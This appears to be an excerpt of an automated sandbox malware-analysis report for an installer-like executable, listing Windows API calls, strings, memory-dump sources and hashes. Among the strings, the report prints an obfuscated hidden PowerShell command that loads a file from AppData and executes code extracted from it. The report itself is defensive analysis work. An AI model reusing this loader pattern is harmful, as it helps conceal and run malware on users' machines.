                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                • DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                • String ID: F
                                                                                                • API String ID: 941294808-1304234792
                                                                                                • Opcode ID: c2d680870d7abd1e1a74e136b5aebc8f23ebe5596e06de1d1944de18111d68fb
                                                                                                • Instruction ID: ce5436bc7dfccdabf5b2378cdbc04c65b8fc1f8d51739f20964cb8902a5fcb59
                                                                                                • Opcode Fuzzy Hash: c2d680870d7abd1e1a74e136b5aebc8f23ebe5596e06de1d1944de18111d68fb
                                                                                                • Instruction Fuzzy Hash: F2419A72804249AFCF058F94CD459AFBFB9FF44310F00812AF961AA1A0C738EA50DFA5
                                                                                                APIs
                                                                                                • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ulf4JrCRk2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76F93410,004033C9), ref: 00405FB4
                                                                                                • CharNextA.USER32(?,?,?,00000000), ref: 00405FC1
                                                                                                • CharNextA.USER32(?,"C:\Users\user\Desktop\ulf4JrCRk2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76F93410,004033C9), ref: 00405FC6
                                                                                                • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76F93410,004033C9), ref: 00405FD6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: Char$Next$Prev
                                                                                                • String ID: "C:\Users\user\Desktop\ulf4JrCRk2.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 589700163-2269724376
                                                                                                • Opcode ID: 8e6880dbf60680850995486114707e5442f3544b6a214aee6d9330f98436af3b
                                                                                                • Instruction ID: 7b30a10291eb0396c8f4e95b118cc70be9f64314849ede57e52aca42a9cf7d7a
                                                                                                • Opcode Fuzzy Hash: 8e6880dbf60680850995486114707e5442f3544b6a214aee6d9330f98436af3b
                                                                                                • Instruction Fuzzy Hash: 9E11C451808B962AEB3216344C44F77BF99CF56760F18007BE9C4B22C2D67C5C429B6D
                                                                                                APIs
                                                                                                • GetWindowLongA.USER32(?,000000EB), ref: 00404070
                                                                                                • GetSysColor.USER32(00000000), ref: 0040408C
                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00404098
                                                                                                • SetBkMode.GDI32(?,?), ref: 004040A4
                                                                                                • GetSysColor.USER32(?), ref: 004040B7
                                                                                                • SetBkColor.GDI32(?,?), ref: 004040C7
                                                                                                • DeleteObject.GDI32(?), ref: 004040E1
                                                                                                • CreateBrushIndirect.GDI32(?), ref: 004040EB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2320649405-0
                                                                                                • Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                                                                • Instruction ID: 47825c477eeffae7bcc1b4b45db8633c52535f80fcd06c8b97140eed864a5805
                                                                                                • Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                                                                • Instruction Fuzzy Hash: 0621A4B18047049BCB309F68DD08B4BBBF8AF40714F048639EA95F26E1C738E944CB65
                                                                                                APIs
                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D7
                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026F3
                                                                                                • GlobalFree.KERNEL32(?), ref: 0040272C
                                                                                                • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 0040273E
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402745
                                                                                                • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 0040275D
                                                                                                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 00402771
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3294113728-0
                                                                                                • Opcode ID: bafe5094320afd5ed78c565945206d1300e9f63e62b661fc9f8f5877e4445c32
                                                                                                • Instruction ID: 472e44718213d797f05a3dbe32253835b8d43bc481b2fe7e733f1056bea7f704
                                                                                                • Opcode Fuzzy Hash: bafe5094320afd5ed78c565945206d1300e9f63e62b661fc9f8f5877e4445c32
                                                                                                • Instruction Fuzzy Hash: D9318DB1C00118BBCF216FA5CD89DAE7E79EF09364F10423AF520772E1C6795D419BA9
                                                                                                APIs
                                                                                                • DestroyWindow.USER32(00000000,00000000), ref: 00402BF2
                                                                                                • GetTickCount.KERNEL32 ref: 00402C10
                                                                                                • wsprintfA.USER32 ref: 00402C3E
                                                                                                  • Part of subcall function 00404FDC: lstrlenA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
                                                                                                  • Part of subcall function 00404FDC: lstrlenA.KERNEL32(00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
                                                                                                  • Part of subcall function 00404FDC: lstrcatA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00402C51,00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000), ref: 00405038
                                                                                                  • Part of subcall function 00404FDC: SetWindowTextA.USER32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) "), ref: 0040504A
                                                                                                  • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
                                                                                                  • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
                                                                                                  • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098
                                                                                                • CreateDialogParamA.USER32(0000006F,00000000,00402B42,00000000), ref: 00402C62
                                                                                                • ShowWindow.USER32(00000000,00000005), ref: 00402C70
                                                                                                  • Part of subcall function 00402BBE: MulDiv.KERNEL32(0004A6ED,00000064,0004FBCE), ref: 00402BD3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                • String ID: ... %d%%
                                                                                                • API String ID: 722711167-2449383134
                                                                                                • Opcode ID: 2f85d0ff04a3e8af9832aa2386f40eece37b54450e37b99d2112a2c5b3a93428
                                                                                                • Instruction ID: 37d10fed78b44bbf962512fa666ce1a12177f0d23356d60e90fa74daf698f4f0
                                                                                                • Opcode Fuzzy Hash: 2f85d0ff04a3e8af9832aa2386f40eece37b54450e37b99d2112a2c5b3a93428
                                                                                                • Instruction Fuzzy Hash: 900165B0949614ABDB216F64AE4DE9F7B78BB01701714C037FA01B11E1C6B8D541CB9E
                                                                                                APIs
                                                                                                • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004048C2
                                                                                                • GetMessagePos.USER32 ref: 004048CA
                                                                                                • ScreenToClient.USER32(?,?), ref: 004048E4
                                                                                                • SendMessageA.USER32(?,00001111,00000000,?), ref: 004048F6
                                                                                                • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040491C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                • String ID: f
                                                                                                • API String ID: 41195575-1993550816
                                                                                                • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                                                                • Instruction ID: add3c7f7873227bd74a4bce1351eac807b502806bceb4e0d6bae9f806a4b5eb6
                                                                                                • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                                                                • Instruction Fuzzy Hash: 61014C75D00218BAEB11DBA4DC85BFFBBBCAB55711F10412BBA10B62C0C7B4A9018BA5
                                                                                                APIs
                                                                                                • GetDC.USER32(?), ref: 00401D29
                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                                                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                                                                                • CreateFontIndirectA.GDI32(0040A7D0), ref: 00401DA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                • String ID: Times New Roman
                                                                                                • API String ID: 3808545654-927190056
                                                                                                • Opcode ID: cef6f2cea5ba3c3df2e6ab678a22e4db87c9e469595493a26a68610c0a25cdc5
                                                                                                • Instruction ID: 34424dcacaa19df80ac017e3b34477b9893efc0acb885e50cf323370767d2cbe
                                                                                                • Opcode Fuzzy Hash: cef6f2cea5ba3c3df2e6ab678a22e4db87c9e469595493a26a68610c0a25cdc5
                                                                                                • Instruction Fuzzy Hash: 05011271948340AFE701DBB0AE0AB9A7F74EB19705F108435F141B72E2C6B954159B2F
                                                                                                APIs
                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B5D
                                                                                                • wsprintfA.USER32 ref: 00402B91
                                                                                                • SetWindowTextA.USER32(?,?), ref: 00402BA1
                                                                                                • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BB3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                • API String ID: 1451636040-1158693248
                                                                                                • Opcode ID: 99857fb9a0cb22b8e24de3565838d35ba34270d242ce7178ee6913b7a03a7076
                                                                                                • Instruction ID: 1ce9201bfa48cab7b8fa553f1801af8382b39519b903b04a6adfa3bfa778fb21
                                                                                                • Opcode Fuzzy Hash: 99857fb9a0cb22b8e24de3565838d35ba34270d242ce7178ee6913b7a03a7076
                                                                                                • Instruction Fuzzy Hash: 0DF01D70900208ABEF215F61CD4ABEE3779EB00345F00803AFA06B51D0D7F8AA558B9A
                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(reckling: Installing,reckling: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046E5,000000DF,0000040F,00000400,00000000), ref: 00404853
                                                                                                • wsprintfA.USER32 ref: 0040485B
                                                                                                • SetDlgItemTextA.USER32(?,reckling: Installing), ref: 0040486E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                • String ID: %u.%u%s%s$reckling: Installing
                                                                                                • API String ID: 3540041739-1892743964
                                                                                                • Opcode ID: f5b98b0d34bd8af263c471b1c7f50a8620f0df1661be5b3956b6e442e3dfe167
                                                                                                • Instruction ID: 1dbe8f306e20f990bcdfb4b2d97c48a080c9d40feb998d0653c6b80998781608
                                                                                                • Opcode Fuzzy Hash: f5b98b0d34bd8af263c471b1c7f50a8620f0df1661be5b3956b6e442e3dfe167
                                                                                                • Instruction Fuzzy Hash: CE11347360012437CB1062699C49EEF3249CBC2334F24823BFA25F71D1E9788C5282E8
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?), ref: 00401CD0
                                                                                                • GetClientRect.USER32(00000000,?), ref: 00401CDD
                                                                                                • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                                                                                                • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                                                                                • DeleteObject.GDI32(00000000), ref: 00401D1B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                • String ID:
                                                                                                • API String ID: 1849352358-0
                                                                                                • Opcode ID: 729fc4278e862243959d7ad856f7c73244b6852cfe4ffc3fdd7b269795ac9902
                                                                                                • Instruction ID: 68903ef9478fc0d920f95a79cd5396482650d24808bb52901199de5d2149753e
                                                                                                • Opcode Fuzzy Hash: 729fc4278e862243959d7ad856f7c73244b6852cfe4ffc3fdd7b269795ac9902
                                                                                                • Instruction Fuzzy Hash: 06F062B2A05114BFD701DBA4EE88CAF77BCEB44301B008576F501F2091C7389D019B79
                                                                                                APIs
                                                                                                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                                                                                • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Timeout
                                                                                                • String ID: !
                                                                                                • API String ID: 1777923405-2657877971
                                                                                                • Opcode ID: 223d8f7865d2b1dd0e95bc8f55079009c40be9e2a37a1be7db68750e4265ac19
                                                                                                • Instruction ID: c8505a4ed1fbcfe48898eca751f608fe424cacc25c72cee6cab93c7adb8e4515
                                                                                                • Opcode Fuzzy Hash: 223d8f7865d2b1dd0e95bc8f55079009c40be9e2a37a1be7db68750e4265ac19
